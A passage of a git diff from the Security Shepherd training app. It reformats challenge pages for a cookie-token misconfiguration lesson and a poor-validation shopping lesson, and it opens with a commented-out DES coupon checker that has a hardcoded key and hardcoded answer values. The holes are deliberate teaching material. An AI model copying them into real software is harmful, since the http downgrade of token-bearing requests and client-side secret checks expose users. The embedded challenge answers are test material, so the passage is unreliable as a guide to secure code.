+		    if (mode == 1) {if (encrypt) {cbcleft = left; cbcright = right;} else {left ^= cbcleft2; right ^= cbcright2;}}
+		    tempresult += String.fromCharCode ((left>>>24), ((left>>>16) & 0xff), ((left>>>8) & 0xff), (left & 0xff), (right>>>24), ((right>>>16) & 0xff), ((right>>>8) & 0xff), (right & 0xff));
+
+		    chunk += 8;
+		    if (chunk == 512) {result += tempresult; tempresult = ""; chunk = 0;}
+		  } //for every 8 characters, or 64 bits in the message
+
+		  //return the result as an array
+		  result += tempresult;
+		  result = result.replace(/\0*$/g, "");
+		  return result;
+		} //end of des
+
+
+
+		//des_createKeys
+		//this takes as input a 64 bit key (even though only 56 bits are used)
+		//as an array of 2 integers, and returns 16 48 bit keys
+		function des_createKeys (key) {
+		  //declaring this locally speeds things up a bit
+		  pc2bytes0  = new Array (0,0x4,0x20000000,0x20000004,0x10000,0x10004,0x20010000,0x20010004,0x200,0x204,0x20000200,0x20000204,0x10200,0x10204,0x20010200,0x20010204);
+		  pc2bytes1  = new Array (0,0x1,0x100000,0x100001,0x4000000,0x4000001,0x4100000,0x4100001,0x100,0x101,0x100100,0x100101,0x4000100,0x4000101,0x4100100,0x4100101);
+		  pc2bytes2  = new Array (0,0x8,0x800,0x808,0x1000000,0x1000008,0x1000800,0x1000808,0,0x8,0x800,0x808,0x1000000,0x1000008,0x1000800,0x1000808);
+		  pc2bytes3  = new Array (0,0x200000,0x8000000,0x8200000,0x2000,0x202000,0x8002000,0x8202000,0x20000,0x220000,0x8020000,0x8220000,0x22000,0x222000,0x8022000,0x8222000);
+		  pc2bytes4  = new Array (0,0x40000,0x10,0x40010,0,0x40000,0x10,0x40010,0x1000,0x41000,0x1010,0x41010,0x1000,0x41000,0x1010,0x41010);
+		  pc2bytes5  = new Array (0,0x400,0x20,0x420,0,0x400,0x20,0x420,0x2000000,0x2000400,0x2000020,0x2000420,0x2000000,0x2000400,0x2000020,0x2000420);
+		  pc2bytes6  = new Array (0,0x10000000,0x80000,0x10080000,0x2,0x10000002,0x80002,0x10080002,0,0x10000000,0x80000,0x10080000,0x2,0x10000002,0x80002,0x10080002);
+		  pc2bytes7  = new Array (0,0x10000,0x800,0x10800,0x20000000,0x20010000,0x20000800,0x20010800,0x20000,0x30000,0x20800,0x30800,0x20020000,0x20030000,0x20020800,0x20030800);
+		  pc2bytes8  = new Array (0,0x40000,0,0x40000,0x2,0x40002,0x2,0x40002,0x2000000,0x2040000,0x2000000,0x2040000,0x2000002,0x2040002,0x2000002,0x2040002);
+		  pc2bytes9  = new Array (0,0x10000000,0x8,0x10000008,0,0x10000000,0x8,0x10000008,0x400,0x10000400,0x408,0x10000408,0x400,0x10000400,0x408,0x10000408);
+		  pc2bytes10 = new Array (0,0x20,0,0x20,0x100000,0x100020,0x100000,0x100020,0x2000,0x2020,0x2000,0x2020,0x102000,0x102020,0x102000,0x102020);
+		  pc2bytes11 = new Array (0,0x1000000,0x200,0x1000200,0x200000,0x1200000,0x200200,0x1200200,0x4000000,0x5000000,0x4000200,0x5000200,0x4200000,0x5200000,0x4200200,0x5200200);
+		  pc2bytes12 = new Array (0,0x1000,0x8000000,0x8001000,0x80000,0x81000,0x8080000,0x8081000,0x10,0x1010,0x8000010,0x8001010,0x80010,0x81010,0x8080010,0x8081010);
+		  pc2bytes13 = new Array (0,0x4,0x100,0x104,0,0x4,0x100,0x104,0x1,0x5,0x101,0x105,0x1,0x5,0x101,0x105);
+
+		  //how many iterations (1 for des, 3 for triple des)
+		  var iterations = key.length > 8 ? 3 : 1; //changed by Paul 16/6/2007 to use Triple DES for 9+ byte keys
+		  //stores the return keys
+		  var keys = new Array (32 * iterations);
+		  //now define the left shifts which need to be done
+		  var shifts = new Array (0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0);
+		  //other variables
+		  var lefttemp, righttemp, m=0, n=0, temp;
+
+		  for (var j=0; j<iterations; j++) { //either 1 or 3 iterations
+		    left = (key.charCodeAt(m++) << 24) | (key.charCodeAt(m++) << 16) | (key.charCodeAt(m++) << 8) | key.charCodeAt(m++);
+		    right = (key.charCodeAt(m++) << 24) | (key.charCodeAt(m++) << 16) | (key.charCodeAt(m++) << 8) | key.charCodeAt(m++);
+
+		    temp = ((left >>> 4) ^ right) & 0x0f0f0f0f; right ^= temp; left ^= (temp << 4);
+		    temp = ((right >>> -16) ^ left) & 0x0000ffff; left ^= temp; right ^= (temp << -16);
+		    temp = ((left >>> 2) ^ right) & 0x33333333; right ^= temp; left ^= (temp << 2);
+		    temp = ((right >>> -16) ^ left) & 0x0000ffff; left ^= temp; right ^= (temp << -16);
+		    temp = ((left >>> 1) ^ right) & 0x55555555; right ^= temp; left ^= (temp << 1);
+		    temp = ((right >>> 8) ^ left) & 0x00ff00ff; left ^= temp; right ^= (temp << 8);
+		    temp = ((left >>> 1) ^ right) & 0x55555555; right ^= temp; left ^= (temp << 1);
+
+		    //the right side needs to be shifted and to get the last four bits of the left side
+		    temp = (left << 8) | ((right >>> 20) & 0x000000f0);
+		    //left needs to be put upside down
+		    left = (right << 24) | ((right << 8) & 0xff0000) | ((right >>> 8) & 0xff00) | ((right >>> 24) & 0xf0);
+		    right = temp;
+
+		    //now go through and perform these shifts on the left and right keys
+		    for (i=0; i < shifts.length; i++) {
+		      //shift the keys either one or two bits to the left
+		      if (shifts[i]) {left = (left << 2) | (left >>> 26); right = (right << 2) | (right >>> 26);}
+		      else {left = (left << 1) | (left >>> 27); right = (right << 1) | (right >>> 27);}
+		      left &= -0xf; right &= -0xf;
+
+		      //now apply PC-2, in such a way that E is easier when encrypting or decrypting
+		      //this conversion will look like PC-2 except only the last 6 bits of each byte are used
+		      //rather than 48 consecutive bits and the order of lines will be according to 
+		      //how the S selection functions will be applied: S2, S4, S6, S8, S1, S3, S5, S7
+		      lefttemp = pc2bytes0[left >>> 28] | pc2bytes1[(left >>> 24) & 0xf]
+		              | pc2bytes2[(left >>> 20) & 0xf] | pc2bytes3[(left >>> 16) & 0xf]
+		              | pc2bytes4[(left >>> 12) & 0xf] | pc2bytes5[(left >>> 8) & 0xf]
+		              | pc2bytes6[(left >>> 4) & 0xf];
+		      righttemp = pc2bytes7[right >>> 28] | pc2bytes8[(right >>> 24) & 0xf]
+		                | pc2bytes9[(right >>> 20) & 0xf] | pc2bytes10[(right >>> 16) & 0xf]
+		                | pc2bytes11[(right >>> 12) & 0xf] | pc2bytes12[(right >>> 8) & 0xf]
+		                | pc2bytes13[(right >>> 4) & 0xf];
+		      temp = ((righttemp >>> 16) ^ lefttemp) & 0x0000ffff; 
+		      keys[n++] = lefttemp ^ temp; keys[n++] = righttemp ^ (temp << 16);
+		    }
+		  } //for each iterations
+		  //return the keys we've created
+		  return keys;
+		} //end of des_createKeys
+
+		var bits = ["048ccd1fb6067ee0e304dc2025b96f4b", "296b66f3e332ab4c27501ca175c3b34d", "048ccd1fb6067ee0d4ca5da7e899def6", "bad5ede188bd1df1db8b06031867621a", "048ccd1fb6067ee0d6bd98bdb9a1a9b8a3f09b75107ca0da", "f316e31f45811c72c4e04380eac44e13", "47e046fb250a0b95cade3eff4ebda29c93157b2fc01c2430", "296b66f3e332ab4c27501ca175c3b34d"];
+
+		function chars_from_hex(inputstr) {
+			var outputstr = '';
+			inputstr = inputstr.replace(/^(0x)?/g, '');
+			inputstr = inputstr.replace(/[^A-Fa-f0-9]/g, '');
+			inputstr = inputstr.split('');
+			for(var i=0; i<inputstr.length; i+=2) {
+				outputstr += String.fromCharCode(parseInt(inputstr[i]+''+inputstr[i+1], 16));
+			}
+			return outputstr;
+		}
+
+		function hex_from_chars(inputstr) {
+			var delimiter = '';
+			var outputstr = '';
+			var hex = "0123456789abcdef";
+			hex = hex.split('');
+			var i, n;
+			var inputarr = inputstr.split('');
+			for(var i=0; i<inputarr.length; i++) {
+				if(i > 0) outputstr += delimiter;
+				if(!delimiter && i % 32 == 0 && i > 0) outputstr += '\n';
+				n = inputstr.charCodeAt(i);
+				outputstr += hex[(n >> 4) & 0xf] + hex[n & 0xf];
+			}
+			return outputstr;
+		}
+
+		function checkCoupon (code) {
+			var theCode = hex_from_chars(des(chars_from_hex('0ba950d08830c8079bded71b852934453db8f4ffff1f5842'), code, 1, chars_from_hex('821fd38b9a7c0247') ? 1 : 0, chars_from_hex('821fd38b9a7c0247')));
+			var a = bits.indexOf(theCode);
+			if(a < 0)
+				return false;
+			else
+				return true;		
+		}
+		*/
+		
+		%>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.jsp b/src/main/webapp/challenges/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.jsp
index 041276dc9..b4aa0273d 100644
--- a/src/main/webapp/challenges/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.jsp
+++ b/src/main/webapp/challenges/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.jsp
@@ -1,156 +1,169 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="servlets.module.challenge.SecurityMisconfigStealTokens, java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="servlets.module.challenge.SecurityMisconfigStealTokens, java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Security Misconfiguration Cookie Challenge
-     *
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    String levelName = new String("Security Misconfiguration Cookie Flag Challenge");
-    String levelHash = new String("c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4");
-
+/**
+ * Security Misconfiguration Cookie Challenge
+ * 
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ * 
+ * @author Mark Denihan
+ */
+ String levelName = new String("Security Misconfiguration Cookie Flag Challenge");
+ String levelHash = new String("c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4");
+ 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.securityMisconfig." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.securityMisconfig." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("securityMisconfig.stealTokens.challengeName");
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String applicationRoot = getServletContext().getRealPath("");
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String userClass = null;
-            if (ses.getAttribute("userClass") != null) {
-                userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
-            }
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String challengeUrl = request.getRequestURL().toString();
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: DEBUG: Challenge URL " + challengeUrl);
-            //Changing URL to HTTP
-            challengeUrl = challengeUrl.replaceAll("(?i)https", "http");
-            //Set User  Cookie
-            try {
-                Cookie userCookie = new Cookie("securityMisconfigLesson", SecurityMisconfigStealTokens.getUserToken(userId, applicationRoot));
-                response.addCookie(userCookie);
-            } catch (Exception e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: Error: Could not Get Token: " + e.toString());
-            }
+String i18nLevelName = bundle.getString("securityMisconfig.stealTokens.challengeName");
+ 
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ 		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String applicationRoot = getServletContext().getRealPath("");
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
+		String userClass = null;
+		if(ses.getAttribute("userClass") != null)
+		{
+			userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
+		}
+		String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+		String challengeUrl = request.getRequestURL().toString();
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: DEBUG: Challenge URL " + challengeUrl);
+		//Changing URL to HTTP
+		challengeUrl = challengeUrl.replaceAll("(?i)https", "http");
+		//Set User  Cookie
+		try
+		{
+			Cookie userCookie = new Cookie("securityMisconfigLesson", SecurityMisconfigStealTokens.getUserToken(userId, applicationRoot));
+	        response.addCookie(userCookie);
+		}
+		catch(Exception e)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: Error: Could not Get Token: " + e.toString());
+		}
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("securityMisconfig.stealTokens.description") %>
-        <br/> <br/> <img height="25px" width="25px" style="display: block;"
-                         alt="<%= bundle.getString("securityMisconfig.stealTokens.whyThisImageIsHere") %>"
-                         title="<%= bundle.getString("securityMisconfig.stealTokens.whyThisImageIsHere") %>"
-                         src="<%= Encode.forHtmlAttribute(challengeUrl) %>"> <br/> <br/>
-            <%= bundle.getString("securityMisconfig.stealTokens.haveSomebodyOnYourNetwork") %>
-        <br/> <br/>
-            <%= bundle.getString("securityMisconfig.stealTokens.stealTokenThenDoThis") %>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("form.securityMisconfig.stealTokens.submit") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("form.challenge.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("securityMisconfig.stealTokens.description") %>
+			<br /> <br /> <img height="25px" width="25px" style="display: block;"
+				alt="<%= bundle.getString("securityMisconfig.stealTokens.whyThisImageIsHere") %>"
+				title="<%= bundle.getString("securityMisconfig.stealTokens.whyThisImageIsHere") %>"
+				src="<%= Encode.forHtmlAttribute(challengeUrl) %>"> <br /> <br />
+			<%= bundle.getString("securityMisconfig.stealTokens.haveSomebodyOnYourNetwork") %>
+			<br /> <br />
+			<%= bundle.getString("securityMisconfig.stealTokens.stealTokenThenDoThis") %>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("form.securityMisconfig.stealTokens.submit") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("form.challenge.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e.jsp b/src/main/webapp/challenges/ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e.jsp
index 6e06418d0..280f34684 100644
--- a/src/main/webapp/challenges/ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e.jsp
+++ b/src/main/webapp/challenges/ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e.jsp
@@ -1,197 +1,192 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    //No Quotes In level Name
-    String levelName = "Poor Validation 1";
-    //Alphanumeric Only
-    String levelHash = "ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e";
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 * 
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 * 
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 * 
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+	 *
+	 * @author Mark Denihan
+	 */
+	//No Quotes In level Name
+	String levelName = "Poor Validation 1";
+	//Alphanumeric Only
+	String levelHash = "ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e";
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.poorValidation.poorValidationStrings",
-            locale);
-    //Used more than once translations
-    String i18nLevelName = bundle.getString("poorValidation.1.challengeName");
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.poorValidation.poorValidationStrings",
+			locale);
+	//Used more than once translations
+	String i18nLevelName = bundle.getString("poorValidation.1.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-            levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-                    levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-                    levelName + " has been accessed by " + ses.getAttribute("userName").toString(),
-                    ses.getAttribute("userName"));
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+			levelName + " Accessed");
+	if (request.getSession() != null) {
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try {
+			tokenCookie = Validate.getToken(request.getCookies());
+		} catch (Exception htmlE) {
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+					levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null) {
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+					levelName + " has been accessed by " + ses.getAttribute("userName").toString(),
+					ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%=i18nLevelName%>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%=i18nLevelName%></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%=i18nLevelName%>
-    </h2>
-    <p>
-            <%=bundle.getString("poorValidation.whatToDo")%>
-        <br/> <br/>
-    <h3 class="title"><%=bundle.getString("poorValidation.shopping")%>
-    </h3>
-    <p><%=bundle.getString("poorValidation.shopping.whatToDo")%>
-    </p>
-    <br/> <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <!-- Header -->
-            <tr>
-                <th><%=bundle.getString("poorValidation.picture")%>
-                </th>
-                <th><%=bundle.getString("poorValidation.cost")%>
-                </th>
-                <th><%=bundle.getString("poorValidation.quantity")%>
-                </th>
-            </tr>
-            <!-- Apple Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%=levelHash%>/apple.jpg"/></td>
-                <td>$45</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfApples" autocomplete="off"/>
-            </tr>
-            <!-- Banana Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%=levelHash%>/banana.jpg"/></td>
-                <td>$15</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfBananas" autocomplete="off"/>
-            </tr>
-            <!-- Orange Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%=levelHash%>/orange.jpg"/></td>
-                <td>$3000</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfOranges" autocomplete="off"/>
-            </tr>
-            <!-- Pineapple Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%=levelHash%>/pineapple.png"/></td>
-                <td>$30</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfPineapples" autocomplete="off"/>
-            </tr>
-        </table>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%=i18nLevelName%></h2>
+		<p>
+			<%=bundle.getString("poorValidation.whatToDo")%>
+			<br /> <br />
+		<h3 class="title"><%=bundle.getString("poorValidation.shopping")%></h3>
+		<p><%=bundle.getString("poorValidation.shopping.whatToDo")%></p>
+		<br /> <br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<!-- Header -->
+				<tr>
+					<th><%=bundle.getString("poorValidation.picture")%></th>
+					<th><%=bundle.getString("poorValidation.cost")%></th>
+					<th><%=bundle.getString("poorValidation.quantity")%></th>
+				</tr>
